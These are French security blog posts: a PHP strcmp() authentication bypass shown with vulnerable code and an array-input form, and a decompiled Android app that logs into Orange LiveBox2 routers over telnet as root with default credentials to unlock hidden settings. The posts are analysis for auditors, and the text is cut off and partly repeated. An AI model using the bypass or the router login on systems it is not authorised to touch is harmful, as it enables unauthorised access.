28-10-2012 19:39:35
[WTF] Euromillion et la sécurité
La blague du jour est issue du site Le Monde sur son article sur le hack du site de l'Euromillion :
La du coup je pense que tout le monde est rassuré sauf ceux qui savent ce qu'est la norme 27001 et ce que signifie son obtention :)
La Francaise des Jeux (FDJ) a précisé que "seule la page d'accueil du site d'information Euromillions.fr avait été touchée" par ce piratage. Le site fdj.fr "continue a fonctionner normalement sans aucune conséquence sur les prises de jeu et sur l'intégrité du jeu", a assuré la FDJ en rappelant qu'elle est le seul opérateur de jeux en France à détenir la norme ISO27001, "le plus haut standard en matière de sécurité informatique".
La du coup je pense que tout le monde est rassuré sauf ceux qui savent ce qu'est la norme 27001 et ce que signifie son obtention :)
01-10-2012 19:27:39
[PHP] Strcmp() bypass
Un article que j'ai beaucoup apprécié vu sur Twitter.
En gros quand on envoie en PHP un tableau à comparer avec une string via la fonction strcmp() ou strcasecmp() alors cela renvoie 0. Ok why not ...
Pour tester sur un cas plus "réel", j'ai testé avec une variable POST avec le code suivant :
Ce qui est assez étonnant c'est que selon la version de PHP ces fonctions renvoient une valeur différente. Ainsi en 5.2, strcmp(string, array) renvoie -1, en 5.3 cela renvoie 0 et en 5.4 cela renvoie un NULL + warning. Un langage hyper bien pensé pour la rétrocompatibilité ...
Bref de nouvelles fonctions à surveiller lors d'un audit de code ou d'un pentest pour bypasser des authentifications ou des sécurités :)
En gros quand on envoie en PHP un tableau à comparer avec une string via la fonction strcmp() ou strcasecmp() alors cela renvoie 0. Ok why not ...
Pour tester sur un cas plus "réel", j'ai testé avec une variable POST avec le code suivant :
<?php
$key = "0wned";
$pass = "tata";
if (strcasecmp( $_POST['pass'], $pass) == 0) {
echo($key);
}
?>
<form action="key.php" method="post" /">
<input type="text" name="pass[]" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="GO" />
</form/>
Bien sur cela marche parfaitement, quoi que l'on mette le echo
s'effectue. Heureusement les sites ne gèrent pas l'authentification
de cette manière en général
mais on doit trouver quelques exceptions pour des cas particuliers.Ce qui est assez étonnant c'est que selon la version de PHP ces fonctions renvoient une valeur différente. Ainsi en 5.2, strcmp(string, array) renvoie -1, en 5.3 cela renvoie 0 et en 5.4 cela renvoie un NULL + warning. Un langage hyper bien pensé pour la rétrocompatibilité ...
Bref de nouvelles fonctions à surveiller lors d'un audit de code ou d'un pentest pour bypasser des authentifications ou des sécurités :)
20-08-2011 01:34:48
[Secu] Deblocage Livebox2, du nouveau ?
En lisant une news de Korben parlant
d'un deblocage de Livebox je me dis "Cool voyons la
technique".
Une version Windows est proposée mais également une Android, ce qui est plus simple à analyser puisque c'est du Java que l'on peut décompiler. On commence donc à télécharger le .apk disponible ici. On le dézip avec tout simplement Winrar puis on transforme le .dex en .jar grace à dex2jar et on ouvre ce .jar avec un decompiler Java tel Java Decompiler :)
Voila on a tout ce qu'il nous faut.
Voici le code obtenu :
Bref tout ca aurait été faisable avec un bete script python de 30 lignes. Décu :(
Une version Windows est proposée mais également une Android, ce qui est plus simple à analyser puisque c'est du Java que l'on peut décompiler. On commence donc à télécharger le .apk disponible ici. On le dézip avec tout simplement Winrar puis on transforme le .dex en .jar grace à dex2jar et on ouvre ce .jar avec un decompiler Java tel Java Decompiler :)
Voila on a tout ce qu'il nous faut.
Voici le code obtenu :
package com.Buckynet.Orange.Unlocker.LiveBox2;
import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.app.ProgressDialog;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.content.Intent;
import android.content.res.Configuration;
import android.content.res.Resources;
import android.graphics.Color;
import android.graphics.PorterDuff.Mode;
import android.graphics.drawable.Drawable;
import android.net.DhcpInfo;
import android.net.Uri;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.util.Log;
import android.view.Menu;
import android.view.MenuItem;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.AdapterView;
import android.widget.AdapterView.OnItemSelectedListener;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.Spinner;
import android.widget.TableLayout;
import android.widget.TextView;
import com.admob.android.ads.AdView;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.net.InetAddress;
import java.net.Socket;
import java.util.Locale;
public class LiveBox2 extends Activity
implements View.OnClickListener
{
private static final String LOG = "LiveBox2 Unlocker ... ";
private static final String TAG = "Buckynet LiveBox2 Unlocker";
private String aa;
private String b1 = "lbv";
private String b2;
private Boolean conectado;
private Button conectar;
private Button config;
private ProgressDialog dialog;
private Button donar;
private String e0 = "1901B95A";
private Button easywifi;
private String es;
private int estado;
private AdView example_adview;
private String fr;
private Handler handler;
private MenuItem item;
protected InetAddress localIP;
private Button lvb2pro;
private Menu menu0;
private Button milvb;
private boolean ok;
private String pass;
private int port = 23;
private int posi;
private Button reboot;
protected InetAddress remoteIP;
private String server;
private Spinner spinner;
private TableLayout table1;
private TextView txt;
private TextView txtads;
private TextView txtfw;
private String user;
private String uu;
private boolean version;
private WifiManager wifi;
public LiveBox2()
{
Boolean localBoolean = Boolean.valueOf(false);
this.conectado = localBoolean;
this.b2 = "TECHNO";
this.user = "root";
this.pass = "1234";
String str1 = String.valueOf(this.b1.toUpperCase());
StringBuilder localStringBuilder = new
StringBuilder(str1).append("2");
String str2 = this.b2.toLowerCase();
String str3 = str2;
this.uu = str3;
this.ok = false;
this.version = false;
this.es = "1901b95ae4295d613abf9eabae0b9d40";
this.fr = "086b352e9b6deeefb4941b900932f138";
this.estado = 0;
1 local1 = new Handler()
{
public void handleMessage(Message paramMessage)
{
LiveBox2.this.dialog.dismiss();
if (!LiveBox2.this.ok)
return;
if (LiveBox2.this.estado == 2)
{
LiveBox2.this.table1.setBackgroundColor(-16733696);
LiveBox2.this.txtads.setText("LiveBox2 Unlocker ... OK");
}
if (LiveBox2.this.estado != 1)
return;
LiveBox2.this.onResume();
}
};
this.handler = local1;
}
private void activarbotones()
{
this.config.setEnabled(true);
this.config.setVisibility(0);
this.reboot.setEnabled(true);
this.reboot.setVisibility(0);
this.milvb.setEnabled(true);
this.milvb.setVisibility(0);
this.txtfw.setEnabled(true);
this.txtfw.setVisibility(0);
this.spinner.setEnabled(true);
this.spinner.setVisibility(0);
}
private void desactivarbotones()
{
this.config.setEnabled(false);
this.config.setVisibility(8);
this.reboot.setEnabled(false);
this.reboot.setVisibility(8);
this.milvb.setEnabled(false);
this.milvb.setVisibility(8);
this.txtfw.setEnabled(false);
this.txtfw.setVisibility(8);
this.spinner.setEnabled(false);
this.spinner.setVisibility(8);
}
private void donar()
{
Uri localUri =
Uri.parse("https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=QD45B9J6MRFHS");
Intent localIntent = new Intent("android.intent.action.VIEW",
localUri);
startActivity(localIntent);
}
private void lvb2pro()
{
Uri localUri =
Uri.parse("market://details?id=com.Buckynet.Orange.Unlocker.Manager.LiveBox2");
Intent localIntent = new Intent("android.intent.action.VIEW",
localUri);
startActivity(localIntent);
}
public String ConvIP(int paramInt)
{
Object[] arrayOfObject = new Object[4];
Integer localInteger1 = Integer.valueOf(paramInt & 0xFF);
arrayOfObject[0] = localInteger1;
Integer localInteger2 = Integer.valueOf(paramInt >> 8 & 0xFF);
arrayOfObject[1] = localInteger2;
Integer localInteger3 = Integer.valueOf(paramInt >> 16 &
0xFF);
arrayOfObject[2] = localInteger3;
Integer localInteger4 = Integer.valueOf(paramInt >> 24 &
0xFF);
arrayOfObject[3] = localInteger4;
return String.format("%d.%d.%d.%d", arrayOfObject);
}
protected void backuprestore()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/pages/backuprestore 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void community()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/community
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void dhcp()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/network/dhcp
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void fax()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/fax 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void fmdev()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/test/fmdev 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void ftlock()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/network/ftlock
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void h323()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/network/h323
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void hsiab()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/hsiab
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void licence()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/licence
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void livezoom()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/livezoom
1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void log()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set wbm/settings/pages/log 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
protected void msgwaiting()
{
try
{
String str1 = this.server;
int i = this.port;
Socket localSocket = new Socket(str1, i);
InputStream localInputStream = localSocket.getInputStream();
InputStreamReader localInputStreamReader = new
InputStreamReader(localInputStream);
BufferedReader localBufferedReader = new
BufferedReader(localInputStreamReader, 8192);
OutputStream localOutputStream = localSocket.getOutputStream();
OutputStreamWriter localOutputStreamWriter = new
OutputStreamWriter(localOutputStream);
PrintWriter localPrintWriter = new
PrintWriter(localOutputStreamWriter, true);
String str2 = this.uu;
localPrintWriter.println(str2);
String str3 = localBufferedReader.readLine();
String str4 = this.aa;
localPrintWriter.println(str4);
String str5 = localBufferedReader.readLine();
String str6 = localBufferedReader.readLine();
localPrintWriter.println("rg_conf_set
wbm/settings/services/msgwaiting 1");
String str7 = localBufferedReader.readLine();
String str8 = localBufferedReader.readLine();
String str9 = localBufferedReader.readLine();
String str10 = localBufferedReader.readLine();
String str11 = localBufferedReader.readLine();
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str12 = localBufferedReader.readLine();
String str13 = str12;
int j = Log.i("Buckynet LiveBox2 Unlocker", str13);
localSocket.close();
return;
}
catch (Exception localException)
{
this.dialog.dismiss();
StringBuilder localStringBuilder2 = new StringBuilder("LiveBox2
Unlocker ... ");
String str14 = localException.toString();
String str15 = str14;
int k = Log.e("Buckynet LiveBox2 Unlocker", str15);
}
}
public void onClick(View paramView)
{
if (paramView.getId() == 2131099651)
{
this.estado = 0;
Intent localIntent1 = new
Intent("android.settings.WIFI_SETTINGS");
startActivity(localIntent1);
}
if (paramView.getId() == 2131099657)
{
this.estado = 0;
if (this.conectado.booleanValue())
{
Uri localUri = Uri.parse("http://livebox");
Intent localIntent2 = new Intent("android.intent.action.VIEW",
localUri);
startActivity(localIntent2);
}
}
if (paramView.getId() == 2131099659)
{
this.estado = 0;
if (!this.conectado.booleanValue());
}
try
{
Process localProcess1 = Runtime.getRuntime().exec("am start -a
android.intent.action.MAIN -n
com.orange.mylivebox/.gui.main.StartupActivity");
if (paramView.getId() == 2131099652)
this.estado = 0;
}
catch (Exception localException1)
{
try
{
Process localProcess2 = Runtime.getRuntime().exec("am start -a
android.intent.action.MAIN -n
com.orange.labs.easywifi/.activity.SplashScreenActivity");
if (paramView.getId() == 2131099658)
{
this.estado = 0;
if (this.conectado.booleanValue())
{
AlertDialog.Builder localBuilder1 = new
AlertDialog.Builder(this);
CharSequence localCharSequence1 =
getResources().getText(2130968587);
AlertDialog.Builder localBuilder2 =
localBuilder1.setMessage(localCharSequence1).setTitle("LiveBox2 Unlocker
... ").setCancelable(true);
CharSequence localCharSequence2 =
getResources().getText(2130968585);
4 local4 = new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface,
int paramInt)
{
LiveBox2.this.estado = 1;
LiveBox2.this.dialog.setMessage("LiveBox2 Unlocker ...
");
LiveBox2.this.dialog.show();
LiveBox2.this.rundic();
}
};
AlertDialog.Builder localBuilder3 =
localBuilder2.setPositiveButton(localCharSequence2, local4);
CharSequence localCharSequence3 =
getResources().getText(2130968586);
5 local5 = new DialogInterface.OnClickListener()
{
public void onClick(DialogInterface paramDialogInterface,
int paramInt)
{
paramDialogInterface.cancel();
}
};
AlertDialog.Builder localBuilder4 =
localBuilder3.setNegativeButton(localCharSequence3, local5);
localBuilder1.create().show();
}
}
if (paramView.getId() == 2131099662)
{
this.estado = 0;
donar();
}
if (paramView.getId() != 2131099663)
return;
this.estado = 0;
lvb2pro();
return;
localException1 = localException1;
StringBuilder localStringBuilder1 = new StringBuilder("LiveBox2
Unlocker ... ");
String str1 = localException1.toString();
String str2 = str1;
int i = Log.e("Buckynet LiveBox2 Unlocker", str2);
}
catch (Exception localException2)
{
while (true)
{
StringBuilder localStringBuilder2 = new
StringBuilder("LiveBox2 Unlocker ... ");
String str3 = localException2.toString();
String str4 = str3;
int j = Log.e("Buckynet LiveBox2 Unlocker", str4);
}
}
}
}
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
TableLayout localTableLayout =
(TableLayout)findViewById(2131099648);
this.table1 = localTableLayout;
TextView localTextView1 = (TextView)findViewById(2131099649);
this.txt = localTextView1;
TextView localTextView2 = (TextView)findViewById(2131099660);
this.txtads = localTextView2;
Button localButton1 = (Button)findViewById(2131099651);
this.conectar = localButton1;
this.conectar.setOnClickListener(this);
Drawable localDrawable = this.conectar.getBackground();
int i = Color.parseColor("#FF8000");
PorterDuff.Mode localMode = PorterDuff.Mode.MULTIPLY;
localDrawable.setColorFilter(i, localMode);
Button localButton2 = (Button)findViewById(2131099652);
this.easywifi = localButton2;
this.easywifi.setOnClickListener(this);
Button localButton3 = (Button)findViewById(2131099657);
this.config = localButton3;
this.config.setOnClickListener(this);
Button localButton4 = (Button)findViewById(2131099658);
this.reboot = localButton4;
this.reboot.setOnClickListener(this);
Button localButton5 = (Button)findViewById(2131099659);
this.milvb = localButton5;
this.milvb.setOnClickListener(this);
Button localButton6 = (Button)findViewById(2131099662);
this.donar = localButton6;
this.donar.setOnClickListener(this);
Button localButton7 = (Button)findViewById(2131099663);
this.lvb2pro = localButton7;
this.lvb2pro.setOnClickListener(this);
ProgressDialog localProgressDialog = new ProgressDialog(this);
this.dialog = localProgressDialog;
this.dialog.setCancelable(false);
TextView localTextView3 = (TextView)findViewById(2131099654);
this.txtfw = localTextView3;
Spinner localSpinner1 = (Spinner)findViewById(2131099655);
this.spinner = localSpinner1;
ArrayAdapter localArrayAdapter =
ArrayAdapter.createFromResource(this, 2131034112, 17367048);
localArrayAdapter.setDropDownViewResource(17367049);
this.spinner.setAdapter(localArrayAdapter);
Spinner localSpinner2 = this.spinner;
MyOnItemSelectedListener localMyOnItemSelectedListener = new
MyOnItemSelectedListener();
localSpinner2.setOnItemSelectedListener(localMyOnItemSelectedListener);
AdView localAdView1 = (AdView)findViewById(2131099661);
this.example_adview = localAdView1;
this.example_adview.setVisibility(0);
this.ok = false;
this.version = false;
Boolean localBoolean = Boolean.valueOf(false);
this.conectado = localBoolean;
AdView localAdView2 = this.example_adview;
2 local2 = new View.OnClickListener()
{
public void onClick(View paramView)
{
LiveBox2.this.estado = 0;
if (!LiveBox2.this.conectado.booleanValue())
return;
LiveBox2.this.dialog.setMessage("LiveBox2 Unlocker ... ");
LiveBox2.this.dialog.show();
LiveBox2.this.estado = 2;
LiveBox2.this.rundic();
}
};
localAdView2.setOnClickListener(local2);
}
public boolean onCreateOptionsMenu(Menu paramMenu)
{
boolean bool = super.onCreateOptionsMenu(paramMenu);
CharSequence localCharSequence1 =
getResources().getText(2130968577);
